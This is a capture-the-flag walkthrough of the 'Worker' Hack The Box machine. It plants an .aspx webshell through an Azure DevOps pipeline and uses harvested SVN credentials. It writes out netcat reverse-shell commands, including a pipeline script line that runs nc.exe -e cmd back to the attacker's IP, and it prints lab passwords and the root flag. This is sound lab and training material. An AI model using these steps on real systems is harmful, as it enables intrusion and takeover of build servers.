As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.067s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman
# Nmap done at Sun Jul 3 15:38:36 2022 -- 1 IP address (1 host up) scanned in 26.52 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:59 2022 as: nmap -sCV -p80,3690,5985 -oN targeted 10.10.10.203
Nmap scan report for worker.htb (10.10.10.203)
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 3 15:39:08 2022 -- 1 IP address (1 host up) scanned in 9.48 seconds
Ports 80 (HTTP), which may have a website, port 3690 (Subversion) and port 5985 (WinRM) are open. If we take a look at the website, we'll see the default IIS page.
As we saw in the nmap report, port 3690 is open. We could try to enumerate the Subversion server. To enumerate the server, run the following command.
svn ls snv://10.10.10.203
dimension.worker.htb/
moved.txt
There is some content in it. Let's download the content of the Subversion server.
svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
If we look in our current directory, we'll see the dimension.worker.htb directory, and the moved.txt file. Let's take a look at that file.
cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
Now that we know a few domain names, let's add them to the /etc/hosts file.
We could also see the commits that have been made.
svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 15:50:20 +0200 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 15:46:19 +0200 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 15:45:16 +0200 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 15:43:43 +0200 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
As we can see, all the commits have been made by the nathen user. Let's see the content of the r2 commit.
svn up -r 2
Updating '.':
D moved.txt
A deploy.ps1
Updated to revision 2.
Now we have the deploy.ps1 file. Let's take a look at it.
Now we have some credentials. Let's take a look at the dimension.worker.htb site, and see if there is any virtual hosting.
Not much going on. Let's take a look now at the devops.worker.htb site.
Let's try to log in with the found credentials.
And we get it.
Exploitation
Let's click on the SmartHotel360 project.
From the Repos section we can see all the subdomains of the worker.htb domain. The idea here is to upload a .aspx webshell, that you can download from here, to one of the subdomains sites, for example the alpha.worker.htb. To do it, select the alpha repository, and click on Upload file(s).
Then select the cmd.aspx file and hit on Commit.
But we get an error because we can not change the master branch. So let's go back, and create a new branch.
Let's call it webshell.
Then, upload the cmd.aspx webshell to the webshell branch.
Then, click on Create a pull request.
And click on Create.
Then, click on Approve.
Now, from the Pipelines section, let's run the Alpha-CI pipeline.
And select the webshell branch.
Finally, the cmd.aspx file is in the master branch, and we can access it from the browser.
http://alpha.worker.htb/cmd.aspx
Time to get a shell. First, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Now, let's set an SMB server on the directory where the nc.exe binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, if we execute the cmd.exe program with the following parameters on the webshell, we'll get a reverse shell as the iis apppool\defaultapppool user.
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 49865
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
whoami
iis apppool\defaultapppool
Privilege Escalation
Enumerating the system, we could guess that the user flag is inside the robisl home directory.
dir \users
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of c:\users
2020-07-07 17:53 <DIR> .
2020-07-07 17:53 <DIR> ..
2020-03-28 15:59 <DIR> .NET v4.5
2020-03-28 15:59 <DIR> .NET v4.5 Classic
2020-08-18 00:33 <DIR> Administrator
2020-03-28 15:01 <DIR> Public
2020-07-22 01:11 <DIR> restorer
2020-07-08 19:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10īŋŊ490īŋŊ904īŋŊ576 bytes free
At this point, something that we could do is enumerate the logical disks available on the system.
wmic logicaldisk get name
Name
C:
W:
There is the W: logical disk. Let's enumerate it.
dir W:
Volume in drive W is Work
Volume Serial Number is E82A-AEA8
Directory of W:\
2020-06-16 18:59 <DIR> agents
2020-03-28 15:57 <DIR> AzureDevOpsData
2020-04-03 11:31 <DIR> sites
2020-06-20 16:04 <DIR> svnrepos
0 File(s) 0 bytes
4 Dir(s) 18īŋŊ768īŋŊ314īŋŊ368 bytes free
Inside the svnrepos directory, we could find the \svnrepos\www\conf\passwd file, which contains a lot of credentials, including the nathen and robisl users.
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
We could try the credentials for the robisl user on the devops.worker.htb website.
Now we see the PartsUnlimited project.
This project only has one repository.
From the Project setings > Security we can see that the robisl user is a member of the Build Administrators group, so we can create pipelines.
Let's go the Pipelines section, and create a new pipeline.
Then, select the Azure Repos Git option.
Then, select the PartsUnlimited project.
Now, select the Starter pipeline.
Then, we will configure the YAML file by changing the pool value to Setup. As the agent pool is called that way.
And then we'll change the script value to a command which will send us a reverse shell.
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
pool: 'Setup'
steps:
- script: echo Hello, world!
displayName: 'Run a one-line script'
- script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
displayName: 'Run a multi-line script'
Make sure to still have the SMB server set on the directory where the nc.exe binary is. Then let's set another netcat listener on port 4444.
rlwrap nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Then, click on Save and run, and select the Create a new branch for this commit and start a pull request option. Then click on Save and run.
Then, we'll have to wait for a bit, and we'll get a shell as the nt authority\system user. Then all we have to do is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 50077
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
type C:\users\administrator\desktop\root.txt
da8deb09764e1567ed487b8ba21c6703
